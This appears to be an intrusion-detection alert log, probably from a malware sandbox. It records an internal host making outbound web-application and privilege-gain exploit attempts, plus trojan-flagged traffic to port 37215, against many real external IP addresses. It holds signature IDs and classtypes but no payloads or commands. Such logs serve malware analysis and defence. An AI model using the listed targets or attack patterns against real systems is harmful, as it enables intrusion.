      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23159.135.59.13646244802025883 01/26/24-15:32:42.602169
      SID:2025883
      Source Port:46244
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.225.26.17856352802025883 01/26/24-15:31:49.538944
      SID:2025883
      Source Port:56352
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.197.204.14558404802025883 01/26/24-15:31:44.628404
      SID:2025883
      Source Port:58404
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.114.96.7050582802030092 01/26/24-15:31:22.833185
      SID:2030092
      Source Port:50582
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23212.36.196.939926802025883 01/26/24-15:31:01.231763
      SID:2025883
      Source Port:39926
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23192.252.184.9634812802030092 01/26/24-15:32:20.331624
      SID:2030092
      Source Port:34812
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23223.119.221.2845996802030092 01/26/24-15:32:43.176340
      SID:2030092
      Source Port:45996
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23121.194.9.19857954802030092 01/26/24-15:31:51.436086
      SID:2030092
      Source Port:57954
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23190.188.119.23743640802025883 01/26/24-15:31:32.992616
      SID:2025883
      Source Port:43640
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2335.74.9.15052340802030092 01/26/24-15:32:01.875204
      SID:2030092
      Source Port:52340
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2320.31.197.739198802030092 01/26/24-15:31:27.808194
      SID:2030092
      Source Port:39198
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.149.45.23655346802025883 01/26/24-15:31:47.560632
      SID:2025883
      Source Port:55346
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.24.247.1654216802030092 01/26/24-15:32:42.593097
      SID:2030092
      Source Port:54216
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.59.4.25037470802030092 01/26/24-15:31:30.832217
      SID:2030092
      Source Port:37470
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23117.215.83.25541036802025883 01/26/24-15:31:52.153014
      SID:2025883
      Source Port:41036
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.87.193.15950068802030092 01/26/24-15:32:39.122866
      SID:2030092
      Source Port:50068
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2324.225.30.2246538802025883 01/26/24-15:33:00.621045
      SID:2025883
      Source Port:46538
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2346.232.249.23334358802030092 01/26/24-15:31:58.828965
      SID:2030092
      Source Port:34358
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2396.11.176.8641084802025883 01/26/24-15:32:11.726295
      SID:2025883
      Source Port:41084
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23173.26.90.11638332802025883 01/26/24-15:31:01.122556
      SID:2025883
      Source Port:38332
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2365.0.126.4658778802025883 01/26/24-15:32:07.167336
      SID:2025883
      Source Port:58778
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2364.44.24.19941134802025883 01/26/24-15:31:52.674016
      SID:2025883
      Source Port:41134
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2378.187.235.23659344802025883 01/26/24-15:32:32.918898
      SID:2025883
      Source Port:59344
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23198.48.58.4137276802025883 01/26/24-15:32:44.634580
      SID:2025883
      Source Port:37276
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23120.24.228.4457014802025883 01/26/24-15:32:46.097536
      SID:2025883
      Source Port:57014
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2343.140.243.5641060802025883 01/26/24-15:31:14.053818
      SID:2025883
      Source Port:41060
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2365.9.190.8041628802030092 01/26/24-15:31:51.771759
      SID:2030092
      Source Port:41628
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2394.137.77.16234182802030092 01/26/24-15:32:30.876888
      SID:2030092
      Source Port:34182
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23134.209.129.20445966802030092 01/26/24-15:31:26.756022
      SID:2030092
      Source Port:45966
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23221.143.28.4843484802030092 01/26/24-15:32:59.009997
      SID:2030092
      Source Port:43484
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23160.124.34.10244892802025883 01/26/24-15:32:23.676383
      SID:2025883
      Source Port:44892
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23121.126.118.10247338802030092 01/26/24-15:31:01.582991
      SID:2030092
      Source Port:47338
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.77.134.10758310372152835222 01/26/24-15:31:28.507560
      SID:2835222
      Source Port:58310
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23188.210.221.15439790802025883 01/26/24-15:32:23.860113
      SID:2025883
      Source Port:39790
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.236.253.17456960802030092 01/26/24-15:32:32.634718
      SID:2030092
      Source Port:56960
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.2.243.10434394802030092 01/26/24-15:32:32.597404
      SID:2030092
      Source Port:34394
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23123.136.83.1046740802025883 01/26/24-15:31:47.683671
      SID:2025883
      Source Port:46740
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.77.134.8238044372152829579 01/26/24-15:31:52.879041
      SID:2829579
      Source Port:38044
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23148.251.126.8558662802030092 01/26/24-15:32:21.791036
      SID:2030092
      Source Port:58662
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.177.20.19240328802030092 01/26/24-15:31:30.679568
      SID:2030092
      Source Port:40328
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.15.7359280802030092 01/26/24-15:31:19.040568
      SID:2030092
      Source Port:59280
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.33.209.7442186802025883 01/26/24-15:31:33.844677
      SID:2025883
      Source Port:42186
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23163.22.230.7260486802030092 01/26/24-15:32:50.944088
      SID:2030092
      Source Port:60486
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.156.238.15959868802025883 01/26/24-15:32:18.244719
      SID:2025883
      Source Port:59868
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23210.158.145.5749402802030092 01/26/24-15:32:28.374838
      SID:2030092
      Source Port:49402
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.32.96.459814802025883 01/26/24-15:32:12.871882
      SID:2025883
      Source Port:59814
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.23.231.4857626802030092 01/26/24-15:32:48.222059
      SID:2030092
      Source Port:57626
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2349.40.48.5248506802025883 01/26/24-15:31:27.006278
      SID:2025883
      Source Port:48506
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23217.243.251.11134724802025883 01/26/24-15:32:21.810147
      SID:2025883
      Source Port:34724
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.46.227.11555366802025883 01/26/24-15:32:50.641050
      SID:2025883
      Source Port:55366
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23152.0.21.13756240802030092 01/26/24-15:31:31.568754
      SID:2030092
      Source Port:56240
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2395.101.219.23744662802030092 01/26/24-15:32:50.045255
      SID:2030092
      Source Port:44662
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23222.236.125.13744992802030092 01/26/24-15:31:44.173874
      SID:2030092
      Source Port:44992
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23217.255.164.2052728802025883 01/26/24-15:32:41.969791
      SID:2025883
      Source Port:52728
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.74.11249042372152829579 01/26/24-15:31:13.367598
      SID:2829579
      Source Port:49042
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23117.51.135.2356360802030092 01/26/24-15:31:27.355741
      SID:2030092
      Source Port:56360
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.65.16.15349056802025883 01/26/24-15:31:58.620312
      SID:2025883
      Source Port:49056
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23107.170.192.17952012802030092 01/26/24-15:31:30.586907
      SID:2030092
      Source Port:52012
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2344.228.83.2351596802030092 01/26/24-15:31:36.754031
      SID:2030092
      Source Port:51596
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23168.76.87.954362802025883 01/26/24-15:31:37.382339
      SID:2025883
      Source Port:54362
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.187.2.18036322802030092 01/26/24-15:32:19.863183
      SID:2030092
      Source Port:36322
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23106.252.219.2838206802030092 01/26/24-15:31:54.023823
      SID:2030092
      Source Port:38206
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.57.190.2539250802025883 01/26/24-15:31:12.751292
      SID:2025883
      Source Port:39250
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.113.19652330372152835222 01/26/24-15:31:19.037267
      SID:2835222
      Source Port:52330
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2345.157.202.2638098802030092 01/26/24-15:31:43.792134
      SID:2030092
      Source Port:38098
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2386.159.25.10833472802025883 01/26/24-15:32:53.508151
      SID:2025883
      Source Port:33472
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23184.24.204.4847744802025883 01/26/24-15:31:26.778442
      SID:2025883
      Source Port:47744
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23174.141.213.15253818802025883 01/26/24-15:32:28.539246
      SID:2025883
      Source Port:53818
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.160.226.10542168802025883 01/26/24-15:31:58.618951
      SID:2025883
      Source Port:42168
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23191.82.36.1150732802025883 01/26/24-15:32:53.548901
      SID:2025883
      Source Port:50732
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23212.23.145.11457594802025883 01/26/24-15:32:21.797565
      SID:2025883
      Source Port:57594
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.254.102.19336296802030092 01/26/24-15:31:41.705239
      SID:2030092
      Source Port:36296
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2379.120.228.19036614802030092 01/26/24-15:31:55.590446
      SID:2030092
      Source Port:36614
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23106.52.83.14857368802025883 01/26/24-15:32:07.993078
      SID:2025883
      Source Port:57368
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.180.111.20454250802025883 01/26/24-15:32:18.971768
      SID:2025883
      Source Port:54250
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23119.63.71.3550196802030092 01/26/24-15:31:33.480876
      SID:2030092
      Source Port:50196
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.93.14353030802030092 01/26/24-15:31:41.576601
      SID:2030092
      Source Port:53030
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.203.117.8648890802025883 01/26/24-15:32:09.635936
      SID:2025883
      Source Port:48890
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2399.84.164.15758968802030092 01/26/24-15:31:52.668950
      SID:2030092
      Source Port:58968
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.196.72.23146890802030092 01/26/24-15:32:15.819740
      SID:2030092
      Source Port:46890
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.24.252.7356140802030092 01/26/24-15:31:01.089994
      SID:2030092
      Source Port:56140
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2370.37.208.22547012802030092 01/26/24-15:32:41.653011
      SID:2030092
      Source Port:47012
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.15.7359550802030092 01/26/24-15:31:28.086609
      SID:2030092
      Source Port:59550
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.171.5.19058752802025883 01/26/24-15:32:28.234297
      SID:2025883
      Source Port:58752
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.77.215.3954978802030092 01/26/24-15:31:33.317181
      SID:2030092
      Source Port:54978
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2358.27.229.5954696802030092 01/26/24-15:32:18.457147
      SID:2030092
      Source Port:54696
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23222.99.0.240348802030092 01/26/24-15:31:23.586367
      SID:2030092
      Source Port:40348
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.186.223.7460054802025883 01/26/24-15:31:15.563497
      SID:2025883
      Source Port:60054
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2351.103.222.22957252802030092 01/26/24-15:31:47.419000
      SID:2030092
      Source Port:57252
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23125.56.205.13542420802025883 01/26/24-15:32:21.670698
      SID:2025883
      Source Port:42420
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.101.158.18648658802025883 01/26/24-15:32:23.736327
      SID:2025883
      Source Port:48658
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.72.37.3652384802030092 01/26/24-15:32:44.709070
      SID:2030092
      Source Port:52384
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2387.55.253.13856330802030092 01/26/24-15:32:09.847234
      SID:2030092
      Source Port:56330
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.165.19.5959722802025883 01/26/24-15:31:52.717870
      SID:2025883
      Source Port:59722
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23205.196.223.11843828802030092 01/26/24-15:31:47.595461
      SID:2030092
      Source Port:43828
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.25.117.18253608802025883 01/26/24-15:32:25.541472
      SID:2025883
      Source Port:53608
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.47.10.2860276802025883 01/26/24-15:33:01.789275
      SID:2025883
      Source Port:60276
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.221.114.7953168802030092 01/26/24-15:32:35.546806
      SID:2030092
      Source Port:53168
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2350.62.222.15055564802025883 01/26/24-15:31:49.642387
      SID:2025883
      Source Port:55564
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23103.151.120.21040842802025883 01/26/24-15:32:33.084081
      SID:2025883
      Source Port:40842
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.20.38.150340802030092 01/26/24-15:31:35.517957
      SID:2030092
      Source Port:50340
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23142.166.236.25140872802030092 01/26/24-15:32:42.618573
      SID:2030092
      Source Port:40872
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2369.135.54.10636628802025883 01/26/24-15:32:11.581498
      SID:2025883
      Source Port:36628
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23198.57.211.4834030802025883 01/26/24-15:32:56.773866
      SID:2025883
      Source Port:34030
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.201.221.1256156802030092 01/26/24-15:31:27.778518
      SID:2030092
      Source Port:56156
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23111.51.104.23142970802025883 01/26/24-15:32:25.685688
      SID:2025883
      Source Port:42970
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.163.56.3434990802030092 01/26/24-15:32:24.018002
      SID:2030092
      Source Port:34990
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23195.42.149.6560862802030092 01/26/24-15:32:21.792089
      SID:2030092
      Source Port:60862
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.188.47.4645194802025883 01/26/24-15:32:39.889155
      SID:2025883
      Source Port:45194
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.113.68.2940470802025883 01/26/24-15:31:58.895992
      SID:2025883
      Source Port:40470
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23106.52.149.2557494802030092 01/26/24-15:32:14.899767
      SID:2030092
      Source Port:57494
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2375.101.206.19358582802030092 01/26/24-15:32:21.492792
      SID:2030092
      Source Port:58582
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.57.227.14258234802030092 01/26/24-15:31:51.452288
      SID:2030092
      Source Port:58234
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.69.13.2843748802030092 01/26/24-15:31:16.977419
      SID:2030092
      Source Port:43748
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.51.27.22247982802025883 01/26/24-15:32:07.295597
      SID:2025883
      Source Port:47982
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.201.21.16259970802030092 01/26/24-15:32:39.039742
      SID:2030092
      Source Port:59970
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2372.246.165.14152866802030092 01/26/24-15:32:53.456854
      SID:2030092
      Source Port:52866
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.196.131.23246070802030092 01/26/24-15:31:13.014919
      SID:2030092
      Source Port:46070
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23212.183.29.5340702802030092 01/26/24-15:32:47.917862
      SID:2030092
      Source Port:40702
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.32.126.3250944802025883 01/26/24-15:31:47.670538
      SID:2025883
      Source Port:50944
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.79.247.5443910802025883 01/26/24-15:32:23.572724
      SID:2025883
      Source Port:43910
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23143.244.211.11039042802025883 01/26/24-15:32:42.632872
      SID:2025883
      Source Port:39042
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.107.144.17433424802025883 01/26/24-15:31:37.805934
      SID:2025883
      Source Port:33424
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.35.52.6847190802025883 01/26/24-15:32:41.764801
      SID:2025883
      Source Port:47190
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.213.247.10141460802030092 01/26/24-15:32:18.461409
      SID:2030092
      Source Port:41460
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.201.91.23248082802025883 01/26/24-15:31:41.784028
      SID:2025883
      Source Port:48082
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.25.49.6034732802030092 01/26/24-15:32:18.576206
      SID:2030092
      Source Port:34732
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.194.223.12051554802025883 01/26/24-15:31:01.075466
      SID:2025883
      Source Port:51554
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2335.223.2.16043372802025883 01/26/24-15:32:41.790683
      SID:2025883
      Source Port:43372
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23213.183.59.24454690802025883 01/26/24-15:32:21.865408
      SID:2025883
      Source Port:54690
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2366.39.97.3749688802030092 01/26/24-15:32:18.363066
      SID:2030092
      Source Port:49688
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2367.205.162.9947936802030092 01/26/24-15:31:27.619334
      SID:2030092
      Source Port:47936
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.10.129.13339718802025883 01/26/24-15:32:33.568575
      SID:2025883
      Source Port:39718
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.14.166.544134802030092 01/26/24-15:32:58.853882
      SID:2030092
      Source Port:44134
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2377.246.102.7938904802025883 01/26/24-15:32:19.760228
      SID:2025883
      Source Port:38904
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2383.240.212.19446456802030092 01/26/24-15:32:21.868639
      SID:2030092
      Source Port:46456
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.249.109.20043456802025883 01/26/24-15:32:58.550474
      SID:2025883
      Source Port:43456
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.71.11.13052724802030092 01/26/24-15:31:52.747621
      SID:2030092
      Source Port:52724
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23178.68.44.8346740802030092 01/26/24-15:31:01.295766
      SID:2030092
      Source Port:46740
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.188.167.5936186802030092 01/26/24-15:31:23.180588
      SID:2030092
      Source Port:36186
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.235.253.0.5242830802025883 01/26/24-15:32:44.946639
      SID:2025883
      Source Port:42830
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.250.15.7359358802025883 01/26/24-15:31:22.634380
      SID:2025883
      Source Port:59358
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23184.51.104.1756314802030092 01/26/24-15:32:07.796229
      SID:2030092
      Source Port:56314
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.224.63.24341116802025883 01/26/24-15:32:07.797964
      SID:2025883
      Source Port:41116
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2366.228.56.19641006802030092 01/26/24-15:32:49.930063
      SID:2030092
      Source Port:41006
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.77.27.11560260802025883 01/26/24-15:31:54.025906
      SID:2025883
      Source Port:60260
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.42.153.20256544802030092 01/26/24-15:32:53.498891
      SID:2030092
      Source Port:56544
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23221.112.50.9242280802030092 01/26/24-15:31:23.967748
      SID:2030092
      Source Port:42280
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.234.37.10551726802030092 01/26/24-15:32:41.768808
      SID:2030092
      Source Port:51726
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23165.95.154.15844052802030092 01/26/24-15:31:18.585023
      SID:2030092
      Source Port:44052
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23176.97.247.24847918802030092 01/26/24-15:32:44.957952
      SID:2030092
      Source Port:47918
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2389.117.50.16039032802025883 01/26/24-15:31:18.793714
      SID:2025883
      Source Port:39032
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23176.56.236.5856236802025883 01/26/24-15:32:30.860397
      SID:2025883
      Source Port:56236
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23206.189.92.21646586802025883 01/26/24-15:31:15.731033
      SID:2025883
      Source Port:46586
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2369.192.228.13047616802025883 01/26/24-15:32:28.904791
      SID:2025883
      Source Port:47616
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23183.90.233.9447038802025883 01/26/24-15:32:28.468365
      SID:2025883
      Source Port:47038
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
